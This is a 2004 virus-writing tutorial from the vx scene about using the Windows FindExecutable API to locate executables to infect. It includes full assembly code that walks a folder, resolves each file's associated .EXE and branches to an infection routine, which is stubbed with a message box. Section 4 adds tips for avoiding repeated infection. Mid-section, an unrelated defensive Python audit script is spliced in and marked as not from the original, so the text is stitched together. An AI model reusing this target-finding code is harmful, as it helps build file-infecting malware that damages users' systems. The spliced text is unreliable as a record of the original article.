Find Victims with FindExecutable API    [by DiA]

  

                              Find Victims with FindExecutable API
                                          by DiA (c)04
                           www.vx-dia.de.vu - DiA_hates_machine@gmx.de
                           ___________________________________________


 ___________________________________________
| 1. Intro                                  |
| 2. API Info (from Win32 SDK Reference)    |
| 3. Example Code                           |
| 4. The Results?                           |
| 5. Outro                                  |
|___________________________________________|



1. Intro

With FindExecutable you can get the full path of the application that handles a file type!
Examples:
.TXT -> linked with Notepad.EXE
.MP3 -> linked with WinAmp.EXE
.DOC -> linked with Word.EXE
...

Now use the FindExecutable API to find the linked application, and you have new victims to infect.
It is hard to explain in words; see the API info and the example code for a better understanding.



2. API Info (from Win32 SDK Reference)

The FindExecutable function retrieves the name and handle to the executable (.EXE) file
associated with the specified filename.

HINSTANCE FindExecutable(
    LPCTSTR lpFile,       // pointer to string for filename
    LPCTSTR lpDirectory,  // pointer to string for default directory
    LPTSTR  lpResult      // pointer to buffer for string for executable file on return
);

Parameters


lpFile

Pointer to a null-terminated string specifying a filename. This can be a document or
executable file.


lpDirectory

Pointer to a null-terminated string specifying the default directory.


lpResult

Pointer to a buffer to receive the filename when the function returns. This filename is
a null-terminated string specifying the executable file started when an "open" association
is run on the file specified in the lpFile parameter.


Return Values

If the function succeeds, the return value is greater than 32.

If the function fails, the return value is less than or equal to 32. The following table
lists the possible error values:

Value                   Meaning
0                       The system is out of memory or resources.
31                      There is no association for the specified file type.
ERROR_FILE_NOT_FOUND    The specified file was not found.
ERROR_PATH_NOT_FOUND    The specified path was not found.
ERROR_BAD_FORMAT        The .EXE file is invalid (non-Win32 .EXE or error in .EXE image).


Remarks

When FindExecutable returns, the lpResult parameter may contain the path to the DDE
server started if no server responds to a request to initiate a DDE conversation.



3. Example Code

;-----FindExecutable.asm-----cut------------------------------------------------------------
.386
.model flat
jumps

extrn MessageBoxA	:PROC
extrn FindExecutableA	:PROC				;to get the linked application
extrn FindFirstFileA	:PROC				;search for *.* -> all files
extrn FindNextFileA	:PROC
extrn ExitProcess	:PROC

.data

FILETIME		STRUC
FT_dwLowDateTime	dd ?
FT_dwHighDateTime	dd ?
FILETIME		ENDS

WIN32_FIND_DATA          label    byte
 WFD_dwFileAttributes    dd       ?
 WFD_ftCreationTime      FILETIME ?
 WFD_ftLastAccessTime    FILETIME ?
 WFD_ftLastWriteTime     FILETIME ?
 WFD_nFileSizeHigh       dd       ?
 WFD_nFileSizeLow        dd       ?
 WFD_dwReserved0         dd       ?
 WFD_dwReserved1         dd       ?
 WFD_szFileName          db       260d dup (?)
 WFD_szAlternateFileName db       13   dup (?)
 WFD_szAlternateEnding   db       03   dup (?)

TargetFile		db 260 dup (?)			;save here the full path of victim

FileMask	db '*.*',0				;all files
FindHandle	dd 0					;save the find handle

.code
start:

push offset WIN32_FIND_DATA
push offset FileMask
call FindFirstFileA					;find first file in current folder
cmp eax,-1						;INVALID_HANDLE_VALUE (-1, not 0) = nothing found
je Ende
mov dword ptr [FindHandle],eax				;save find handle

FindNext:
test eax,eax						;no more filez, exit
jz Ende

push offset TargetFile					;save here full path of victim
push 0							;current directory
push offset WFD_szFileName				;file to get linked application
call FindExecutableA

cmp eax,32d						;if <=32 there was an error (success is >32)
jbe FindNextPhile					;find next file

mov esi,offset TargetFile
call GetPoint						;get point to check extension
inc esi

cmp byte ptr [esi],'E'					;check if linked application
jne CheckAgain						;is a exe
inc esi							;maybe it's linked to .BAT or .PIF
cmp byte ptr [esi],'X'
jne CheckAgain
inc esi
cmp byte ptr [esi],'E'
je InfectFile						;if .EXE infect it

CheckAgain:
mov esi,offset TargetFile
call GetPoint
inc esi

cmp byte ptr [esi],'e'					;check for .exe
jne FindNextPhile
inc esi
cmp byte ptr [esi],'x'
jne FindNextPhile
inc esi
cmp byte ptr [esi],'e'
jne FindNextPhile					;if no .exe find next file

InfectFile:
push 0							;here the infection routine
push offset WFD_szFileName				;but only a MessageBox to show
push offset TargetFile					;that it works
push 0							;full path of linked application
call MessageBoxA					;is now in "TargetFile"

FindNextPhile:						;find next file
push offset WIN32_FIND_DATA
push dword ptr [FindHandle]				;via find handle
call FindNextFileA
jmp FindNext						;do it again

Ende:
push 0
call ExitProcess					;exit


GetPoint:						;i love this procedure ;)
cmp byte ptr [esi],'.'					;scan string for "."
jz PointFound
inc esi
jmp GetPoint
PointFound:
ret							;return

end start						;the end...
;-----FindExecutable.asm-----cut------------------------------------------------------------


4. The Results?

If it works as intended, the full path of a new victim is in "TargetFile" as a string, like
"C:\Windows\Notepad.exe" (without the quotes). But when you search with "*.*" you also find
folders! Not a big problem, because folders are linked with "C:\Windows\Explorer.exe".
If you don't want to infect it again and again, just check "TargetFile" for "Explorer.exe".

Another good thing: if "*.*" finds a .EXE, FindExecutable returns the same path.
Example:
WFD_szFileName = C:\Tests\FindExecutableTest.exe
TargetFile     = C:\Tests\FindExecutableTest.exe
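As an added example (not code from DiA's article, and Python instead of the .asm above): the same FindExecutable call driven through ctypes, but used the way a defender would, to audit which handler every entry in a folder resolves to and to flag handlers that live outside a baseline of trusted directories. Return values are interpreted per the SDK table in section 2 (anything <= 32 is a failure, including 32 itself), and the two cases from section 4 (an .EXE resolving to itself, a folder resolving to Explorer.exe) are handled explicitly. The trusted-directory list and the sample paths are constructed assumptions; only find_executable and audit_folder need Windows, the classification helpers run anywhere.

```python
# Added example, not code from DiA's article: FindExecutable driven from Python
# via ctypes and used as an audit of file-type handlers. Windows-only parts are
# kept inside functions so the classification logic runs (and tests) anywhere.
import ntpath
import os
import sys

MAX_PATH = 260  # same buffer size as TargetFile in the .asm above

# Failure values from the SDK table in section 2 (anything <= 32 is a failure).
ERROR_FILE_NOT_FOUND = 2
ERROR_PATH_NOT_FOUND = 3
ERROR_BAD_FORMAT = 11
SE_ERR_NOASSOC = 31

_FAILURE_TEXT = {
    0: "the system is out of memory or resources",
    SE_ERR_NOASSOC: "there is no association for the specified file type",
    ERROR_FILE_NOT_FOUND: "the specified file was not found",
    ERROR_PATH_NOT_FOUND: "the specified path was not found",
    ERROR_BAD_FORMAT: "the .EXE file is invalid",
}


def interpret_return(rc):
    """Map a FindExecutable return value to (ok, description).

    Success is strictly greater than 32, so 32 itself is a failure."""
    if rc > 32:
        return True, "ok"
    return False, _FAILURE_TEXT.get(rc, "unknown failure value %d" % rc)


def find_executable(path):
    """Resolve the 'open' handler of *path* with FindExecutableW. Windows only.

    Returns (True, handler_path) or (False, failure_description)."""
    import ctypes
    from ctypes import wintypes

    fn = ctypes.WinDLL("shell32").FindExecutableW
    fn.argtypes = [wintypes.LPCWSTR, wintypes.LPCWSTR, wintypes.LPWSTR]
    fn.restype = ctypes.c_size_t  # HINSTANCE; carries the failure value when <= 32
    buf = ctypes.create_unicode_buffer(MAX_PATH)
    ok, text = interpret_return(fn(path, None, buf))  # None = current directory
    return ok, (buf.value if ok else text)


def classify_handler(path, handler, trusted_dirs):
    """Say why a resolved handler matters to a defender.

    "self"      an .EXE resolves to itself (section 4 above)
    "folder"    a directory resolves to the shell, Explorer.exe (section 4 above)
    "trusted"   handler lives under one of the baseline directories
    "untrusted" handler lives anywhere else, e.g. a user-writable location"""
    h = ntpath.normcase(handler)  # lower-case, backslashes; works off Windows too
    if h == ntpath.normcase(path):
        return "self"
    if ntpath.basename(h) == "explorer.exe":
        return "folder"
    for d in trusted_dirs:
        if h.startswith(ntpath.normcase(d).rstrip("\\") + "\\"):
            return "trusted"
    return "untrusted"


def audit_folder(folder, trusted_dirs):
    """Walk one folder (like the FindFirstFile/FindNextFile loop in the .asm)
    and return (entry, handler, classification) for every entry. Windows only."""
    report = []
    for name in sorted(os.listdir(folder)):
        entry = os.path.join(folder, name)
        ok, result = find_executable(entry)
        if ok:
            report.append((entry, result, classify_handler(entry, result, trusted_dirs)))
        else:
            report.append((entry, None, "failure: " + result))
    return report


if __name__ == "__main__" and sys.platform == "win32":
    # Constructed baseline: the system and program directories count as trusted.
    baseline = [os.environ.get("SystemRoot", r"C:\Windows"), r"C:\Program Files"]
    for row in audit_folder(os.getcwd(), baseline):
        print(row)
```

An "untrusted" row is the one worth looking at: a document type whose "open" handler has been re-pointed to a user-writable directory is what a hijacked association looks like, and comparing the report against an earlier run of the same script gives a simple change detector for it.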



5. Outro

That's all about the FindExecutable API! Have fun with this and thx for reading! For any
comments please leave an entry in my guestbook (www.vx-dia.de.vu), or mail me at:

                                                                 DiA_hates_machine@gmx.de



                                                                  _________________
                                                                  DiA (c)04 GermanY